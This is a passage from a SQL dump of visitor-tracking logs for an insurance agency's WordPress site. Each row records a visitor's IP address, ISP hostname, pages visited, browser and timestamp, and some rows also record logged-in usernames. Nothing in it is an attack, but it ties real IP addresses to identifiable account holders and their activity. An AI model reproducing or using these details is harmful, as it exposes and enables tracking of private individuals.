MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(10856,'0b_ec885c6e17e3bf3ce503b9e8aa5e21c6','1459439212','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(10859,'0b_ec885c6e17e3bf3ce503b9e8aa5e21c6','1459439214','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(10862,'0b_ec885c6e17e3bf3ce503b9e8aa5e21c6','1459439437','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(10863,'0b_ec885c6e17e3bf3ce503b9e8aa5e21c6','1459439438','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(10866,'0b_2d3c19ba56791c491fa473d80c1848d8','1459439799','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'WinVista','Chrome 49','us','','','','','','','0','0',0),(10869,'0b_2d3c19ba56791c491fa473d80c1848d8','1459439801','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 49','us','','','','','','','0','0',0),(10871,'0b_afb2c3a536c54df2b22f3e33abed4888','1459440586','75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(10872,'0b_afb2c3a536c54df2b22f3e33abed4888','1459440590','75.99.37.250','ool-4b6325fa.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(10875,'0b_afb2c3a536c54df2b22f3e33abed4888','1459440628','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(10878,'0b_afb2c3a536c54df2b22f3e33abed4888','1459440645','75.99.37.250','ool-4b6325fa.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(10881,'0b_afb2c3a536c54df2b22f3e33abed4888','1459441716','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carrier-field-underwriting-guides/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(10884,'0b_864bf160a8d30e35bf3588e56c84a02f','1459441721','65.73.133.178','65-73-133-178.dsl1.mon.ny.frontiernet.net','/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Google Chrome','us','','Google','','','','','0','0',0),(10887,'0b_864bf160a8d30e35bf3588e56c84a02f','1459441726','65.73.133.178','65-73-133-178.dsl1.mon.ny.frontiernet.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Google Chrome','us','','','','','','','0','0',0),(10890,'0b_afb2c3a536c54df2b22f3e33abed4888','1459441728','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(10892,'0b_afb2c3a536c54df2b22f3e33abed4888','1459441751','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(10893,'0b_afb2c3a536c54df2b22f3e33abed4888','1459441756','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(10895,'0b_2f433d6664faf3b3fea6c30c1d351bcc','1459441809','65.73.133.178','65-73-133-178.dsl1.mon.ny.frontiernet.net','/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Google Chrome','us','1920 x 1080','Google','','','','','0','0',0),(10898,'0b_2f433d6664faf3b3fea6c30c1d351bcc','1459441810','65.73.133.178','65-73-133-178.dsl1.mon.ny.frontiernet.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(10899,'0b_2f433d6664faf3b3fea6c30c1d351bcc','1459441855','65.73.133.178','65-73-133-178.dsl1.mon.ny.frontiernet.net','/about-us/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','51',0),(10902,'0b_2f433d6664faf3b3fea6c30c1d351bcc','1459441860','65.73.133.178','65-73-133-178.dsl1.mon.ny.frontiernet.net','/insentives/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','51',0),(10905,'0b_2f433d6664faf3b3fea6c30c1d351bcc','1459441877','65.73.133.178','65-73-133-178.dsl1.mon.ny.frontiernet.net','/contact/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/insentives/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','51',0),(10908,'0b_2f433d6664faf3b3fea6c30c1d351bcc','1459441880','65.73.133.178','65-73-133-178.dsl1.mon.ny.frontiernet.net','/carriers/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/contact/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','51',0),(10910,'0b_2f433d6664faf3b3fea6c30c1d351bcc','1459441882','65.73.133.178','65-73-133-178.dsl1.mon.ny.frontiernet.net','/contact/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','51',0),(10911,'0b_ad1bbba9c64ff6096b624931c98c47e4','1459442308','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','us','1536 x 864','','','','','','3','0',0),(10914,'0b_ad1bbba9c64ff6096b624931c98c47e4','1459442310','104.246.54.244','ool-68f636f4.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1536 x 864','','','','','','3','0',0),(10917,'0b_ad1bbba9c64ff6096b624931c98c47e4','1459442317','104.246.54.244','ool-68f636f4.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1536 x 864','','','','','','3','0',0),(10920,'0b_ad1bbba9c64ff6096b624931c98c47e4','1459442454','104.246.54.244','ool-68f636f4.dyn.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1536 x 864','','','','','','3','51',0),(10923,'0b_ad1bbba9c64ff6096b624931c98c47e4','1459442513','104.246.54.244','ool-68f636f4.dyn.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7','IE 11','us','1536 x 864','','','','','','3','51',0),(10925,'0b_ad1bbba9c64ff6096b624931c98c47e4','1459442549','104.246.54.244','ool-68f636f4.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/','',0,'Win7','IE 11','us','1536 x 864','','','','','','3','51',0),(10928,'0b_ad1bbba9c64ff6096b624931c98c47e4','1459442555','104.246.54.244','ool-68f636f4.dyn.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1536 x 864','','','','','','3','51',0),(10929,'0b_ad1bbba9c64ff6096b624931c98c47e4','1459442599','104.246.54.244','ool-68f636f4.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7','IE 11','us','1536 x 864','','','','','','3','51',0),(10932,'0b_ad1bbba9c64ff6096b624931c98c47e4','1459442609','104.246.54.244','ool-68f636f4.dyn.optonline.net','/?page_id=169','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7','IE 11','us','1536 x 864','','','','','','3','169',0),(10934,'0b_ad1bbba9c64ff6096b624931c98c47e4','1459442610','104.246.54.244','ool-68f636f4.dyn.optonline.net','/register/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7','IE 11','us','1536 x 864','','','','','','3','51',0),(10935,'0b_ad1bbba9c64ff6096b624931c98c47e4','1459442977','104.246.54.244','ool-68f636f4.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/register/','',0,'Win7','IE 11','us','1536 x 864','','','','','','0','51',0),(10938,'0b_873bc34c06f59ca396dbcdbed8662fac','1459443065','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(10940,'0b_873bc34c06f59ca396dbcdbed8662fac','1459443066','104.246.54.244','ool-68f636f4.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(10941,'0b_c512b593a128f911b76965f6ffcc1377','1459443171','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10943,'0b_c512b593a128f911b76965f6ffcc1377','1459443173','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10946,'0b_c512b593a128f911b76965f6ffcc1377','1459443179','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10949,'0b_c512b593a128f911b76965f6ffcc1377','1459443180','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10952,'0b_ad1bbba9c64ff6096b624931c98c47e4','1459443185','104.246.54.244','ool-68f636f4.dyn.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7','IE 11','us','1536 x 864','','','','','','0','51',0),(10953,'0b_c512b593a128f911b76965f6ffcc1377','1459443186','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10955,'0b_c512b593a128f911b76965f6ffcc1377','1459443192','108.58.88.178','ool-6c3a58b2.static.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','51',0),(10958,'0b_9b6a48800fe7f8b652445a906894206d','1459443248','108.58.88.178','ool-6c3a58b2.static.optonline.net','/wp-admin/user-edit.php?user_id=212','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','0',0),(10959,'0b_9b6a48800fe7f8b652445a906894206d','1459443258','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','0',0),(10961,'0b_9b6a48800fe7f8b652445a906894206d','1459443259','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','cheskelb','','0','0',0),(10962,'0b_ad1bbba9c64ff6096b624931c98c47e4','1459443637','104.246.54.244','ool-68f636f4.dyn.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','51',0),(10965,'0b_ad1bbba9c64ff6096b624931c98c47e4','1459443643','104.246.54.244','ool-68f636f4.dyn.optonline.net','/members/?a=pwdchange','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','51',0),(10967,'0b_ad1bbba9c64ff6096b624931c98c47e4','1459443660','104.246.54.244','ool-68f636f4.dyn.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/?a=pwdchange','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','51',0),(10970,'0b_ad1bbba9c64ff6096b624931c98c47e4','1459443693','104.246.54.244','ool-68f636f4.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/members/','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','51',0),(10973,'0b_0d1b43be7c7d5fcca3c2eb9edad2fb9a','1459444849','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(10976,'0b_0d1b43be7c7d5fcca3c2eb9edad2fb9a','1459444856','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(10979,'0b_c512b593a128f911b76965f6ffcc1377','1459445081','108.58.88.178','ool-6c3a58b2.static.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(10982,'0b_c512b593a128f911b76965f6ffcc1377','1459445090','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/members/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(10985,'0b_c512b593a128f911b76965f6ffcc1377','1459445132','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(10986,'0b_c512b593a128f911b76965f6ffcc1377','1459445137','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/forms/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(10988,'0b_c512b593a128f911b76965f6ffcc1377','1459445142','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(10991,'0b_3f62ccf548af8f826349193df7ee7aef','1459445359','65.73.133.178','65-73-133-178.dsl1.mon.ny.frontiernet.net','/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/contact/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(10994,'0b_3f62ccf548af8f826349193df7ee7aef','1459445362','65.73.133.178','65-73-133-178.dsl1.mon.ny.frontiernet.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(10995,'0b_546d5f37f6578a678604ef8618884d73','1459445385','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(10997,'0b_546d5f37f6578a678604ef8618884d73','1459445390','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(10998,'0b_747cad3791ff13bf6fd80bbe81f84ae5','1459445961','66.249.75.89','crawl-66-249-75-89.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11001,'0b_747cad3791ff13bf6fd80bbe81f84ae5','1459445976','66.249.75.96','crawl-66-249-75-96.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11004,'0b_bac0a2ed72ec6a44ae856a00da461188','1459447465','104.246.54.244','ool-68f636f4.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','0',0),(11007,'0b_bac0a2ed72ec6a44ae856a00da461188','1459447475','104.246.54.244','ool-68f636f4.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','51',0),(11010,'0b_bac0a2ed72ec6a44ae856a00da461188','1459448001','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','51',0),(11013,'0b_bac0a2ed72ec6a44ae856a00da461188','1459448003','104.246.54.244','ool-68f636f4.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','0',0),(11015,'0b_bac0a2ed72ec6a44ae856a00da461188','1459448010','104.246.54.244','ool-68f636f4.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1536 x 864','','','','avistern1','','0','51',0),(11016,'0b_71f328993d33e695252624f646b063a4','1459448099','52.26.3.49','ec2-52-26-3-49.us-west-2.compute.amazonaws.com','/robots.txt','Searchie/1.0 (a Storm-based crawler; https://www.searchie.org; admin@searchie.org)','','',0,'','','','','','Searchie','','','','0','0',0),(11018,'0b_71f328993d33e695252624f646b063a4','1459448100','52.26.3.49','ec2-52-26-3-49.us-west-2.compute.amazonaws.com','/','Searchie/1.0 (a Storm-based crawler; https://www.searchie.org; admin@searchie.org)','','',0,'','','','','','Searchie','','','','0','0',0),(11019,'0b_39fd8cb57047b50adec05766331dbe33','1459448319','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(11021,'0b_39fd8cb57047b50adec05766331dbe33','1459448320','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(11024,'0b_cfd34600c23e47151b92e05eeafe4f67','1459452292','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(11025,'0b_760db90f02bb6203e47f77d090f909d5','1459452557','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(11027,'0b_760db90f02bb6203e47f77d090f909d5','1459452559','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','0',0),(11028,'0b_760db90f02bb6203e47f77d090f909d5','1459452562','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(11031,'0b_760db90f02bb6203e47f77d090f909d5','1459452570','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(11034,'0b_546d5f37f6578a678604ef8618884d73','1459452654','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(11036,'0b_546d5f37f6578a678604ef8618884d73','1459452660','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(11037,'0b_546d5f37f6578a678604ef8618884d73','1459452668','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(11039,'0b_73d9347998e539248ae0618c9cc28a4b','1459455251','212.83.161.127','212-83-161-127.rev.poneytelecom.eu','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50','http://www.empireins.com','',0,'WinXP','Opera 8','eu','','','','','','','0','0',0),(11042,'0b_8719f60c7da5d189e1070007d161c1c2','1459456580','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(11045,'0b_8719f60c7da5d189e1070007d161c1c2','1459456581','104.246.54.244','ool-68f636f4.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(11048,'0b_8719f60c7da5d189e1070007d161c1c2','1459456588','104.246.54.244','ool-68f636f4.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 